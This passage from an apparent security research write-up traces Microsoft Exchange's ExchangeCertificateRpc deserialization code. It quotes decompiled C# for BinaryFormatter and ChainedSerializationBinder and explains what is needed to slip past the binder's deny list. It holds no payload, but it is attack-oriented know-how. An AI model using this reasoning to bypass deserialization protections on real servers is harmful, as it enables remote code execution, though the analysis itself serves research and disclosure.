\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0inputParameters = (Dictionary<RpcParameters, object>)DeserializeObject(inputBlob, customized: false); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0case ExchangeCertificateRpcVersion.Version2: \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0inputParameters = BuildInputParameters(inputBlob); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0outputParameters = new Dictionary<RpcOutput, object>(); \n \u00a0\u00a0\u00a0\u00a0if (outputBlob != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0switch (version) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0case ExchangeCertificateRpcVersion.Version1: \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0outputParameters = (Dictionary<RpcOutput, object>)DeserializeObject(outputBlob, customized: false); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0case ExchangeCertificateRpcVersion.Version2: \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0outputParameters = BuildOutputParameters(outputBlob); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0break; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n }\n \n\nHere we can see that the `byte[] inputBlob` from earlier is passed to `DeserializeObject(inputBlob, customized: false)` in the case that `ExchangeCertificateRpcVersion` parameter passed in is `ExchangeCertificateRpcVersion.Version1`.\n\nOkay so already we know we have one limitation in that we need to set the `version` parameter here to `ExchangeCertificateRpcVersion.Version1` somehow.\n\nKeeping this in mind lets explore further and look at the `Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc.DeserializeObject(inputBlob, customized:false)` call implementation.\n \n \n // Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc \n using System.IO; \n using Microsoft.Exchange.Data.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n private object DeserializeObject(byte[] data, bool customized) \n { \n \u00a0\u00a0\u00a0\u00a0if (data != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (MemoryStream serializationStream = new MemoryStream(data)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bool strictModeStatus = Microsoft.Exchange.Data.Serialization.Serialization.GetStrictModeStatus(DeserializeLocation.ExchangeCertificateRpc); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.ExchangeCertificateRpc, strictModeStatus, allowedTypes, allowedGenerics).Deserialize(serializationStream); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return null; \n }\n \n\nInteresting so we can see that we create a new `MemoryStream` object from our `byte[] data` parameter and use this to create a serialization stream of type `MemoryStream`. We then check using `Microsoft.Exchange.Data.Serialization.Serialization.GetStrictModeStatus` to see if `DeserializeLocation.ExchangeCertificateRpc` requires strict mode for deserialization or not and we set the boolean `strictModeStatus` to this result.\n\nFinally we create a binary formatter using `ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.ExchangeCertificateRpc, strictModeStatus, allowedTypes, allowedGenerics)` and then call its `Deserialize()` method on the serialized `MemoryStream` object we created earlier using `byte[] data`.\n\nNote that before the November 2021 patch, this `DeserializeObject` function actually looked like this:\n \n \n // Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc \n using System.IO; \n using Microsoft.Exchange.Data.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n private object DeserializeObject(byte[] data, bool customized) \n { \n \u00a0\u00a0\u00a0\u00a0if (data != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (MemoryStream serializationStream = new MemoryStream(data)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0BinaryFormatter binaryFormatter = new BinaryFormatter();\n \t\t\tif (customized)\n \t\t\t{\n \t\t\t\tbinaryFormatter.Binder = new CustomizedSerializationBinder();\n \t\t\t}\n \t\t\treturn binaryFormatter.Deserialize(memoryStream);\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return null; \n }\n \n \n\nAs we can see the earlier code here was using `BinaryFormatter` to deserialize the payload without using a proper `SerializationBinder` or really any protection at all for that matter.\n\n## Looking At DeserializeObject() Deeper\n\nLets look at the November 2022 edition of `Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc.DeserializeObject(inputBlob, customized:false)` again:\n \n \n // Microsoft.Exchange.Management.SystemConfigurationTasks.ExchangeCertificateRpc \n using System.IO; \n using Microsoft.Exchange.Data.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n private object DeserializeObject(byte[] data, bool customized) \n { \n \u00a0\u00a0\u00a0\u00a0if (data != null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0using (MemoryStream serializationStream = new MemoryStream(data)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bool strictModeStatus = Microsoft.Exchange.Data.Serialization.Serialization.GetStrictModeStatus(DeserializeLocation.ExchangeCertificateRpc); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return ExchangeBinaryFormatterFactory.CreateBinaryFormatter(DeserializeLocation.ExchangeCertificateRpc, strictModeStatus, allowedTypes, allowedGenerics).Deserialize(serializationStream); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0return null; \n }\n \n\nWhat we want to check here now is the `ExchangeBinaryFormatterFactor.CreateBinaryFormatter` call. What does the code for this look like?\n \n \n // Microsoft.Exchange.Diagnostics.ExchangeBinaryFormatterFactory \n using System.Runtime.Serialization.Formatters.Binary; \n \n public static BinaryFormatter CreateBinaryFormatter(DeserializeLocation usageLocation, bool strictMode = false, string[] allowList = null, string[] allowedGenerics = null) \n { \n \u00a0\u00a0\u00a0\u00a0return new BinaryFormatter \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Binder = new ChainedSerializationBinder(usageLocation, strictMode, allowList, allowedGenerics) \n \u00a0\u00a0\u00a0\u00a0}; \n }\n \n\nAh our good old friend `ChainedSerializationBinder` and `BinaryFormatter`. Looks like we will need to create a `BinaryFormatter` serialized payload and `ChainedSerializationBinder` will be the validator.\n\nAs mentioned in the article to bypass this logic we need to ensure that `strictMode` is set to `False` and that we are not using any fully qualified assembly name in the deny list defined in `Microsoft.Exchange.Diagnostics.ChainedSerializationBinder.GlobalDisallowedTypesForDeserialization`, which will pretty much kill all publicly known .NET deserialization gadgets from ysoserial.NET.\n\nFor reference this is the code for `ChainedSerializationBinder` in November 2021 Update:\n \n \n // Microsoft.Exchange.Diagnostics.ChainedSerializationBinder \n using System; \n using System.Collections.Generic; \n using System.IO; \n using System.Linq; \n using System.Reflection; \n using System.Runtime.Serialization; \n using Microsoft.Exchange.Diagnostics; \n \n public class ChainedSerializationBinder : SerializationBinder \n { \n \u00a0\u00a0\u00a0\u00a0private const string TypeFormat = \"{0}, {1}\"; \n \n \u00a0\u00a0\u00a0\u00a0private static readonly HashSet<string> AlwaysAllowedPrimitives = new HashSet<string> \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(string).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(int).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(uint).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(long).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(ulong).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(double).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(float).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(bool).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(short).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(ushort).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(byte).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(char).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(DateTime).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(TimeSpan).FullName, \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeof(Guid).FullName \n \u00a0\u00a0\u00a0\u00a0}; \n \n \u00a0\u00a0\u00a0\u00a0private bool strictMode; \n \n \u00a0\u00a0\u00a0\u00a0private DeserializeLocation location; \n \n \u00a0\u00a0\u00a0\u00a0private Func<string, Type> typeResolver; \n \n \u00a0\u00a0\u00a0\u00a0private HashSet<string> allowedTypesForDeserialization; \n \n \u00a0\u00a0\u00a0\u00a0private HashSet<string> allowedGenericsForDeserialization; \n \n \u00a0\u00a0\u00a0\u00a0private bool serializationOnly; \n \n \u00a0\u00a0\u00a0\u00a0protected static HashSet<string> GlobalDisallowedTypesForDeserialization { get; private set; } = BuildDisallowedTypesForDeserialization(); \n \n \n \u00a0\u00a0\u00a0\u00a0protected static HashSet<string> GlobalDisallowedGenericsForDeserialization { get; private set; } = BuildGlobalDisallowedGenericsForDeserialization(); \n \n \n \u00a0\u00a0\u00a0\u00a0public ChainedSerializationBinder() \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0serializationOnly = true; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public ChainedSerializationBinder(DeserializeLocation usageLocation, bool strictMode = false, string[] allowList = null, string[] allowedGenerics = null) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0this.strictMode = strictMode; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0allowedTypesForDeserialization = ((allowList != null && allowList.Length != 0) ? new HashSet<string>(allowList) : null); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0allowedGenericsForDeserialization = ((allowedGenerics != null && allowedGenerics.Length != 0) ? new HashSet<string>(allowedGenerics) : null); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeResolver = typeResolver ?? ((Func<string, Type>)((string s) => Type.GetType(s))); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0location = usageLocation; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override void BindToName(Type serializedType, out string assemblyName, out string typeName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0string text = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0string text2 = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0InternalBindToName(serializedType, out assemblyName, out typeName); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (assemblyName == null && typeName == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0assemblyName = text; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeName = text2; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0public override Type BindToType(string assemblyName, string typeName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (serializationOnly) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new InvalidOperationException(\"ChainedSerializationBinder was created for serialization only.\u00a0\u00a0This instance cannot be used for deserialization.\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Type type = InternalBindToType(assemblyName, typeName); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (type != null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0ValidateTypeToDeserialize(type); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return type; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0protected virtual Type InternalBindToType(string assemblyName, string typeName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return LoadType(assemblyName, typeName); \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0protected Type LoadType(string assemblyName, string typeName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Type type = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type = Type.GetType($\"{typeName}, {assemblyName}\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (TypeLoadException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (FileLoadException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (type == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0string shortName = assemblyName.Split(',')[0]; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type = Type.GetType($\"{typeName}, {shortName}\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (TypeLoadException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch (FileLoadException) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (type == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Assembly[] assemblies = AppDomain.CurrentDomain.GetAssemblies(); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0IEnumerable<Assembly> source = assemblies.Where((Assembly x) => shortName == x.FullName.Split(',')[0]); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Assembly assembly = (source.Any() ? source.First() : null); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (assembly != null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type = assembly.GetType(typeName); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Assembly[] array = assemblies; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0foreach (Assembly assembly2 in array) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0type = assembly2.GetType(typeName); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!(type != null)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0continue; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return type; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0catch \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return type; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0protected virtual void InternalBindToName(Type serializedType, out string assemblyName, out string typeName) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0assemblyName = null; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0typeName = null; \n \u00a0\u00a0\u00a0\u00a0} \n \n \u00a0\u00a0\u00a0\u00a0protected void ValidateTypeToDeserialize(Type typeToDeserialize) \n \u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (typeToDeserialize == null) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0return; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0string fullName = typeToDeserialize.FullName; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0bool flag = strictMode; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0try \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (!strictMode && (allowedTypesForDeserialization == null || !allowedTypesForDeserialization.Contains(fullName)) && GlobalDisallowedTypesForDeserialization.Contains(fullName)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0flag = true; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new InvalidOperationException($\"Type {fullName} failed deserialization (BlockList).\"); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (typeToDeserialize.IsConstructedGenericType) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0fullName = typeToDeserialize.GetGenericTypeDefinition().FullName; \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (allowedGenericsForDeserialization == null || !allowedGenericsForDeserialization.Contains(fullName) || GlobalDisallowedGenericsForDeserialization.Contains(fullName)) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0throw new BlockedDeserializeTypeException(fullName, BlockedDeserializeTypeException.BlockReason.NotInAllow, location); \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0} \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else if (!AlwaysAllowedPrimitives.Contains(fullName) && (allowedTypesForDeserialization == null || !allowedTypesForDeserialization.Contains(fullName) || GlobalDisallowedTypesForDeserialization.Contains(fullName)) && !typeToDeserialize.IsArray && !typeToDeserialize.IsEnum && !typeToDeserialize.IsAbstract && !typeToDeserialize.IsInterface) \n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0{ 